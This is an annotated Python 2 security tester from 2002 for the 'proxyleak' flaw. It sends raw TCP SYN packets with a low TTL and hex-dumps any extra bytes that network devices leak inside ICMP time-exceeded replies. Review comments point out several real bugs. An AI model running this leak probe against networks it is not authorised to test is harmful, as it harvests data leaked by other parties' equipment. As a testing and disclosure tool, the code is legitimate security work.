#! /usr/bin/python
#############################################################################
##                                                                         ##
##  proxyleak.py --- Simple tester for the proxyleak vulnerability         ##
##                                                                         ##
##  Copyright (C) 2002 Philippe Biondi                                     ##
##                                                                         ##
##  This program is free software; you can redistribute it and/or modify   ##
##  it under the terms of the GNU General Public License as published by   ##
##  the Free Software Foundation; either version 2, or (at your option)    ##
##  any later version.                                                     ##
##                                                                         ##
##  This program is distributed in the hope that it will be useful, but    ##
##  WITHOUT ANY WARRANTY; without even the implied warranty of             ##
##  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU      ##
##  General Public License for more details.                               ##
##                                                                         ##
#############################################################################
#
# Python 2 script (print statements, `except X, y:` syntax, dict.has_key).
# It needs raw-socket privileges: one AF_INET/SOCK_RAW socket with
# IP_HDRINCL to emit a hand-built IPv4+TCP datagram, and one
# AF_PACKET/SOCK_RAW socket (Linux-specific) to read back whole Ethernet
# frames. What it sends on the wire is a single TCP SYN whose IP TTL is
# taken from `-t` (default 1); what it looks for in return is ICMP
# type 11 / code 0 (time exceeded) messages and whatever bytes trail the
# expected quoted datagram inside them.
from socket import *
import getopt,sys
from select import select

def usage():
    # Print the command-line synopsis and exit with status 0.
    print "Usage: proxyleak.py [-f finalhost] [-t targetttl] [-p port]"
    sys.exit(0)

# EtherType for IPv4 frames; used as the protocol filter of the AF_PACKET
# socket below (passed through htons()).
ETH_P_IP=0x800

def sane(x):
    # Return a printable rendering of the byte string x: every byte whose
    # ordinal is < 32 or >= 127 becomes '.', everything else is kept as-is.
    r=""
    for i in x:
        j = ord(i)
        if (j < 32) or (j >= 127):
            r=r+"."
        else:
            r=r+i
    return r

def hexdump(x):
    # Print x as space-separated two-digit hex bytes on one line, followed
    # by its sane() rendering. The trailing comma on the print statement
    # keeps all hex bytes on the same output line.
    l = len(x)
    for i in range(l):
        print "%02X" % ord(x[i]),
    print " "+sane(x)

# Defaults, overridable with -t / -p / -f respectively.
ttl=1
port=80
target="www.google.com"

try:
    opts=getopt.getopt(sys.argv[1:], "hf:t:p:")
    for opt,parm in opts[0]:
        if opt == "-h":
            usage()
        elif opt == "-f":
            target = parm
        elif opt == "-t":
            try:
                ttl = int(parm)
            except TypeError:
                # NOTE(review): int() on a non-numeric string raises
                # ValueError, not TypeError, so a bad -t value is not
                # turned into the GetoptError below; the ValueError
                # propagates as a traceback instead.
                raise getopt.GetoptError("ttl parameter (%s) must be an int" % parm, None)
        elif opt == "-p":
            try:
                port = int(parm)
            except TypeError:
                # NOTE(review): same ValueError-vs-TypeError mismatch as
                # for -t above. Also, `port` is never read again after
                # this point; the packet bytes below carry fixed ports.
                raise getopt.GetoptError("port parameter (%s) must be an int" % parm, None)
    if len(opts[1]) > 0:
        raise getopt.GetoptError("Too many parameters : [%s]" % " ".join(opts[1]),None)
    # Accept target either as dotted-quad or as a hostname; after this
    # block `target` is always a dotted-quad string.
    try:
        n=inet_aton(target)
    except error:
        try:
            target=gethostbyname(target)
            n=inet_aton(target)
        except error:
            # NOTE(review): `parm` here is the value of the *last* option
            # processed (and is unbound if no options were given), not the
            # host name that failed to resolve; `target` is what the
            # message means.
            raise getopt.GetoptError("host [%s] not found" % parm, None)
except getopt.error, msg:
    print "ERROR:", msg
    sys.exit(1)

# Hand-built 40-byte IPv4 + TCP datagram:
#   "E" (0x45)         version 4, IHL 5
#   "\x00\x00("        TOS 0, total length 0x28 = 40
#   "\x00\x00\x00\x00" identification 0, flags/fragment 0
#   chr(ttl)           TTL from -t
#   "\x06"             protocol 6 = TCP
#   "\x00\x00"         IP checksum left 0
#   "\x00\x00\x00\x00" source address left 0
#   inet_aton(target)  destination address
#   "\x00P\x00P"       TCP source/destination port 0x50 = 80 (fixed; -p unused)
#   8 zero bytes       sequence / acknowledgement numbers
#   "P\x02"            data offset 5, flags 0x02 (SYN)
#   "\x00\x01"         window 1
#   "\x93'"            TCP checksum (precomputed constant)
#   "\x00\x00"         urgent pointer
# The zeroed IP checksum and source address are presumably expected to be
# filled in by the kernel, which is why IP_HDRINCL is set on the sending
# socket below — verify against the platform's raw-socket semantics.
packet="E\x00\x00(\x00\x00\x00\x00"+chr(ttl)+"\x06\x00\x00\x00\x00\x00\x00"+inet_aton(target)+"\x00P\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02\x00\x01\x93\'\x00\x00"

try:
    # Sending socket: raw IPv4 with the header supplied by us (IP_HDRINCL).
    s=socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)
    s.setsockopt(SOL_IP, IP_HDRINCL, 1)
    # Receiving socket: link-layer socket delivering complete IPv4 frames,
    # Ethernet header included.
    t=socket(AF_PACKET, SOCK_RAW, htons(ETH_P_IP))
    i = 0
    # Payloads already printed, so each distinct trailing blob is shown once.
    seen={}
    # Runs until KeyboardInterrupt: send the probe, then drain every frame
    # that is immediately readable (select timeout 0) before sending again.
    while 1:
        s.sendto(packet, (target,0))
        while 1:
            i,o,e = select([t],[],[],0)
            if not i:
                break
            p = t.recv(1600)
            # Byte 14+9: IP protocol field just past the 14-byte Ethernet
            # header; keep ICMP only.
            if ord(p[14+9]) != IPPROTO_ICMP:
                continue
            # Skip Ethernet (14) + IPv4 header (20, no options assumed).
            p=p[34:]
            # ICMP type 11 (time exceeded), code 0.
            if p[:2] != "\x0b\x00":
                continue
            # Skip a further 54 bytes — presumably the ICMP header plus the
            # quoted copy of the probe datagram — and dump whatever trails
            # it; that trailing data is what the tool reports. Offset not
            # derivable from the code alone; confirm against the format of
            # the replies being examined.
            p=p[54:]
            if seen.has_key(p):
                continue
            seen[p]=None
            hexdump(p)
            # print repr(p)
except KeyboardInterrupt:
    pass